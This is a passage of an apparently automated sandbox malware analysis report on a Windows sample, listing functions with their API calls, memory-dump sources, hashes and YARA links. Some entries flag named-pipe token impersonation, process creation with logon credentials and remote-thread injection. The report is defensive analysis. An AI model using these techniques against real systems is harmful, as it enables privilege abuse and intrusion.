                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                                                                  • String ID:
                                                                  • API String ID: 4140391395-0
                                                                  • Opcode ID: 2915a5590191083fef4be69073d3087bf6c31db82160f2517f5d5cdc6336bfe3
                                                                  • Instruction ID: f1ede146e3986c6c749607a541bc7f6849a598c9a0ec1d5d4aa1769f02bccb0b
                                                                  • Opcode Fuzzy Hash: 2915a5590191083fef4be69073d3087bf6c31db82160f2517f5d5cdc6336bfe3
                                                                  • Instruction Fuzzy Hash: 39110A2270554085EB02BF15D9813AE7611A7C1BF0F6A9719EE3A077D6C77CC441C765
                                                                  Function 0355B353 Relevance: 12.6, APIs: 10, Instructions: 116COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno
                                                                  • String ID:
                                                                  • API String ID: 2288870239-0
                                                                  • Opcode ID: 35aca9194c528ae9650a35c73d1bdbf2d60b0283d2e9458ab8899a63ba071189
                                                                  • Instruction ID: 0ffd5d8426149a996a9a47a3db6ef1d6e70e5682b955ab9fb46cc7cea66b64f4
                                                                  • Opcode Fuzzy Hash: 35aca9194c528ae9650a35c73d1bdbf2d60b0283d2e9458ab8899a63ba071189
                                                                  • Instruction Fuzzy Hash: EF31A230665E0B8FEB65EB98F8E876573E1FB58312F94012AA905C71B0FB7CA405C741
                                                                  Function 00401D50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 185COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • Mingw-w64 runtime failure:, xrefs: 00401D88
                                                                  • Address %p has no image-section, xrefs: 00401DC0
                                                                  • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                                                                  • VirtualProtect failed with code 0x%x, xrefs: 00401F56
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: QueryVirtual
                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                  • API String ID: 1804819252-1534286854
                                                                  • Opcode ID: eb96bce5aba28f4b7fd5428a67a7dc765e3f26f51d184c285f7c9c3ca2c1b9e4
                                                                  • Instruction ID: 10d76aa513752d408286ffc26ec959f6f169e193d9772deefbdc98a11bb0eab9
                                                                  • Opcode Fuzzy Hash: eb96bce5aba28f4b7fd5428a67a7dc765e3f26f51d184c285f7c9c3ca2c1b9e4
                                                                  • Instruction Fuzzy Hash: 2C51DFB2701B4086DB109F26E94475E77A1F799BA4F58423AEF98233E1EA3CC485C748
                                                                  Function 009B21D4 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 009B21FF
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • __doserrno.LIBCMT ref: 009B21F7
                                                                    • Part of subcall function 009AD9A0: _getptd_noexit.LIBCMT ref: 009AD9A4
                                                                  • __lock_fhandle.LIBCMT ref: 009B2243
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                                                                  • String ID:
                                                                  • API String ID: 2611593033-0
                                                                  • Opcode ID: a02034d4b4650baad4229769328548c6f1890294151ac8472b2d8ade1b3a2288
                                                                  • Instruction ID: 3cb9377e657cb28dc8054357c9983b35f461c1dc5b9853323b8b4d462ae94afe
                                                                  • Opcode Fuzzy Hash: a02034d4b4650baad4229769328548c6f1890294151ac8472b2d8ade1b3a2288
                                                                  • Instruction Fuzzy Hash: 0A1136327055404AE70A6F65DA8137E7610FBC1BB0F4A4514EA3A4B7E6CB7CC841C7A5
                                                                  Function 009B64E8 Relevance: 12.1, APIs: 8, Instructions: 63COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 2289611984-0
                                                                  • Opcode ID: 37b9bd9e17fee378057beb1ff239737341f39bc7a40d7ae34c3b228ff369500e
                                                                  • Instruction ID: e2ab4169c9a3aabb2236608a3488f3e78b4d3a99209b8d65d8b5d7117412ff80
                                                                  • Opcode Fuzzy Hash: 37b9bd9e17fee378057beb1ff239737341f39bc7a40d7ae34c3b228ff369500e
                                                                  • Instruction Fuzzy Hash: B311083130064086E7256F65DAC43AE7B159BC1B70F090528FA17073EADBBCE891C754
                                                                  Function 009B19F8 Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 009B1A19
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • __doserrno.LIBCMT ref: 009B1A11
                                                                    • Part of subcall function 009AD9A0: _getptd_noexit.LIBCMT ref: 009AD9A4
                                                                  • __lock_fhandle.LIBCMT ref: 009B1A5D
                                                                  • _close_nolock.LIBCMT ref: 009B1A70
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                                                                  • String ID:
                                                                  • API String ID: 4060740672-0
                                                                  • Opcode ID: c172c206cd4e7ddd8af84d695408c21dd265f297318fe74827d56422459edfc6
                                                                  • Instruction ID: 3c42a3e0f1821b336f493674bd91e9c6978ad5d82ebbcac321743e8cfcbee9eb
                                                                  • Opcode Fuzzy Hash: c172c206cd4e7ddd8af84d695408c21dd265f297318fe74827d56422459edfc6
                                                                  • Instruction Fuzzy Hash: F611CC3270624086E3057F65DEE03AD3B10A7C17B0F9A4A29E91B073E7D77CD8818354
                                                                  Function 0099FD54 Relevance: 12.0, APIs: 8, Instructions: 45pipethreadfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: NamedPipe$Thread$ClientCloseConnectCurrentDisconnectErrorFileHandleImpersonateLastOpenReadToken
                                                                  • String ID:
                                                                  • API String ID: 1569842636-0
                                                                  • Opcode ID: dd18e85b62bb72f84cdd973b91bb500c1b818d908ed9a3d94947706d4ab7db66
                                                                  • Instruction ID: d86965fe4face0553a9a26b7915b597280746893ddcbc6d896b706f01a65137f
                                                                  • Opcode Fuzzy Hash: dd18e85b62bb72f84cdd973b91bb500c1b818d908ed9a3d94947706d4ab7db66
                                                                  • Instruction Fuzzy Hash: E5118820718944C2FB20EB66F864BA97368FB81BA4F844831984B87673CF7CC448E750
                                                                  Function 03543A53 Relevance: 11.6, APIs: 9, Instructions: 305COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 03543AF0
                                                                    • Part of subcall function 0355A66F: _FF_MSGBANNER.LIBCMT ref: 0355A69F
                                                                    • Part of subcall function 0355A66F: _NMSG_WRITE.LIBCMT ref: 0355A6A9
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A6DD
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6E8
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6F3
                                                                  • malloc.LIBCMT ref: 03543AFA
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A703
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A708
                                                                  • malloc.LIBCMT ref: 03543B05
                                                                  • free.LIBCMT ref: 03543CC5
                                                                  • free.LIBCMT ref: 03543CCD
                                                                  • free.LIBCMT ref: 03543CD5
                                                                    • Part of subcall function 03544937: malloc.LIBCMT ref: 03544981
                                                                    • Part of subcall function 03544937: malloc.LIBCMT ref: 0354498C
                                                                    • Part of subcall function 03544937: free.LIBCMT ref: 03544A73
                                                                    • Part of subcall function 03544937: free.LIBCMT ref: 03544A7B
                                                                  • free.LIBCMT ref: 03543CE1
                                                                  • free.LIBCMT ref: 03543CEE
                                                                  • free.LIBCMT ref: 03543CFB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$malloc$_errno$_callnewh
                                                                  • String ID:
                                                                  • API String ID: 4160633307-0
                                                                  • Opcode ID: 530378328aa492e52dc02055a43799409f433604a0ca5208a2b7f677f439ae0d
                                                                  • Instruction ID: 43248158c1baf105ec92e2cdad07fa0d4fbc0c9387110c148c5bca64591d5198
                                                                  • Opcode Fuzzy Hash: 530378328aa492e52dc02055a43799409f433604a0ca5208a2b7f677f439ae0d
                                                                  • Instruction Fuzzy Hash: 5581EA38718B0D4BC71DEB6CA45177A73E5FBC5608F44426ED88BC7272EE24E8168686
                                                                  Function 0099460C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 009946A9
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • malloc.LIBCMT ref: 009946B3
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB2BC
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2C1
                                                                  • malloc.LIBCMT ref: 009946BE
                                                                  • free.LIBCMT ref: 0099487E
                                                                  • free.LIBCMT ref: 00994886
                                                                  • free.LIBCMT ref: 0099488E
                                                                    • Part of subcall function 009954F0: malloc.LIBCMT ref: 0099553A
                                                                    • Part of subcall function 009954F0: malloc.LIBCMT ref: 00995545
                                                                    • Part of subcall function 009954F0: free.LIBCMT ref: 0099562C
                                                                    • Part of subcall function 009954F0: free.LIBCMT ref: 00995634
                                                                  • free.LIBCMT ref: 0099489A
                                                                  • free.LIBCMT ref: 009948A7
                                                                  • free.LIBCMT ref: 009948B4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$malloc$_errno$_callnewh$AllocHeap
                                                                  • String ID:
                                                                  • API String ID: 3534990644-0
                                                                  • Opcode ID: 9ed940ff76df828764eb2dd6c0d9eaeab286c07fe672a7b4cb73b39db3b14b40
                                                                  • Instruction ID: 45039d0143728a105029cf6fda0b1f9c784c4fb1b3143070c77e96da0d6af02f
                                                                  • Opcode Fuzzy Hash: 9ed940ff76df828764eb2dd6c0d9eaeab286c07fe672a7b4cb73b39db3b14b40
                                                                  • Instruction Fuzzy Hash: 716100227047C586DF269F6B9850B6E7B99FBC6BC8F404129DE4A57B06DB38C506CB00
                                                                  Function 009A071C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128processCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 009A4720: malloc.LIBCMT ref: 009A473C
                                                                  • GetStartupInfoA.KERNEL32 ref: 009A07E4
                                                                    • Part of subcall function 0099F9F4: MultiByteToWideChar.KERNEL32 ref: 0099FA21
                                                                    • Part of subcall function 0099F9F4: MultiByteToWideChar.KERNEL32 ref: 0099FA49
                                                                  • GetCurrentDirectoryW.KERNEL32 ref: 009A0871
                                                                  • GetCurrentDirectoryW.KERNEL32 ref: 009A0880
                                                                  • CreateProcessWithLogonW.ADVAPI32 ref: 009A08DB
                                                                  • GetLastError.KERNEL32 ref: 009A08E5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
                                                                  • String ID: %s as %s\%s: %d
                                                                  • API String ID: 3435635427-816037529
                                                                  • Opcode ID: c4d0bd8c8d1650db23838cda0cb1772cb4ec40593c69114b5c06a473d9adb743
                                                                  • Instruction ID: 918de97c32fe9788fb9b2fea60388c6fd1ef01e1add2da2366391e54b8e71dc4
                                                                  • Opcode Fuzzy Hash: c4d0bd8c8d1650db23838cda0cb1772cb4ec40593c69114b5c06a473d9adb743
                                                                  • Instruction Fuzzy Hash: F8514832608B8186EB20DF5AF85075AB7A9F7C9BD4F144129EF8987B29DF3CC4558B40
                                                                  Function 0355B1F7 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 0355B21D
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0355B229
                                                                  • __crtIsPackagedApp.LIBCMT ref: 0355B23A
                                                                  • _dosmaperr.LIBCMT ref: 0355B284
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 2917016420-0
                                                                  • Opcode ID: 9ffea0a240096b91e1fdf5f90bdd08ebf8829419d51855dc8a3edd7770b2e173
                                                                  • Instruction ID: 41ccb472ef780cec63913948a5ee4a085121addf5a5d4299ce2d5d3fcc8942ae
                                                                  • Opcode Fuzzy Hash: 9ffea0a240096b91e1fdf5f90bdd08ebf8829419d51855dc8a3edd7770b2e173
                                                                  • Instruction Fuzzy Hash: 9A31A930614B098FDB44EF6CA86836D76E1FBC9315F14466EB84AC72B0E738D4418792
                                                                  Function 0356592F Relevance: 10.6, APIs: 7, Instructions: 78COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
                                                                  • String ID:
                                                                  • API String ID: 4120058822-0
                                                                  • Opcode ID: bb62ca6a869fd799953b52af43a8a16501762a68a04c9f5967b7872d49b086bf
                                                                  • Instruction ID: ed276ae31b68e460537c96c6e55a1263c99fa914bad1b717f2fa8adadc260e45
                                                                  • Opcode Fuzzy Hash: bb62ca6a869fd799953b52af43a8a16501762a68a04c9f5967b7872d49b086bf
                                                                  • Instruction Fuzzy Hash: A921F631694B414FD715EB68F8D432D7AB0FF87324B050A6DE42ACB2B1E6746841C351
                                                                  Function 009BBAD0 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009BBB04
                                                                    • Part of subcall function 009AE220: _getptd.LIBCMT ref: 009AE236
                                                                    • Part of subcall function 009AE220: __updatetlocinfo.LIBCMT ref: 009AE26B
                                                                    • Part of subcall function 009AE220: __updatetmbcinfo.LIBCMT ref: 009AE292
                                                                  • _errno.LIBCMT ref: 009BBB1F
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 009BBB2A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 3191669884-0
                                                                  • Opcode ID: 328d8a49d1344a363d2d9206dfc988e432a709b8c59ca3d65d1e60162fe80d08
                                                                  • Instruction ID: bb6d1e1d68684800ac273ac47b7266962277e2cd6ad5ab55e2f4dc8bcd7619da
                                                                  • Opcode Fuzzy Hash: 328d8a49d1344a363d2d9206dfc988e432a709b8c59ca3d65d1e60162fe80d08
                                                                  • Instruction Fuzzy Hash: 7B21A1727187948AD7219F12D684B9EB7A8F785BF0F544125EF5917B88CBB8C841C740
                                                                  Function 009A25CC Relevance: 10.6, APIs: 7, Instructions: 71threadinjectionlibraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Thread$Context$AddressCreateHandleModuleProcRemoteResume
                                                                  • String ID:
                                                                  • API String ID: 2251766279-0
                                                                  • Opcode ID: cda92236576d422590614138ebd043a8d54cf374cbff29895d120080c94ff4ce
                                                                  • Instruction ID: 6b73a74884a91260f8455ed702cc07bee35815327969cd007544cfbc51de4103
                                                                  • Opcode Fuzzy Hash: cda92236576d422590614138ebd043a8d54cf374cbff29895d120080c94ff4ce
                                                                  • Instruction Fuzzy Hash: 8B219072205B8086EB24CF2AB94439E73A9F789BD4F684526DE8D43B54DF38C945CB44
                                                                  Function 009A33D8 Relevance: 10.6, APIs: 7, Instructions: 58pipeCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseHandle$free$DisconnectNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 3879126888-0
                                                                  • Opcode ID: 1f44d1ca3af26b607275eec106c5fff713e0699c1995d1b408019d5d241d12ef
                                                                  • Instruction ID: d883d6dab130d38c553d28b6003ad84de5ca7ab0b8a8e18e569eddd6bbb535aa
                                                                  • Opcode Fuzzy Hash: 1f44d1ca3af26b607275eec106c5fff713e0699c1995d1b408019d5d241d12ef
                                                                  • Instruction Fuzzy Hash: 2A21FA26614A50D3DA55DB12E79832873B5F799FE0F149412EB5A07F26DF38E9B08340
                                                                  Function 009A40A0 Relevance: 10.6, APIs: 7, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTickioctlsocket
                                                                  • String ID:
                                                                  • API String ID: 3686034022-0
                                                                  • Opcode ID: f0f6b3c44b94660aacd045b44c8b61ad45f8cbe6460a0484ebb3670360ef76d3
                                                                  • Instruction ID: e1776397474de98ff7225d2b343a9ac5d71aec6d736f73cbd6c93470087507e6
                                                                  • Opcode Fuzzy Hash: f0f6b3c44b94660aacd045b44c8b61ad45f8cbe6460a0484ebb3670360ef76d3
                                                                  • Instruction Fuzzy Hash: 44112931304A4086E7104F69F8443997369F7E5B79F904934DA16836A5DFBCCC89C750
                                                                  Function 009A2D80 Relevance: 10.6, APIs: 7, Instructions: 51pipefileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
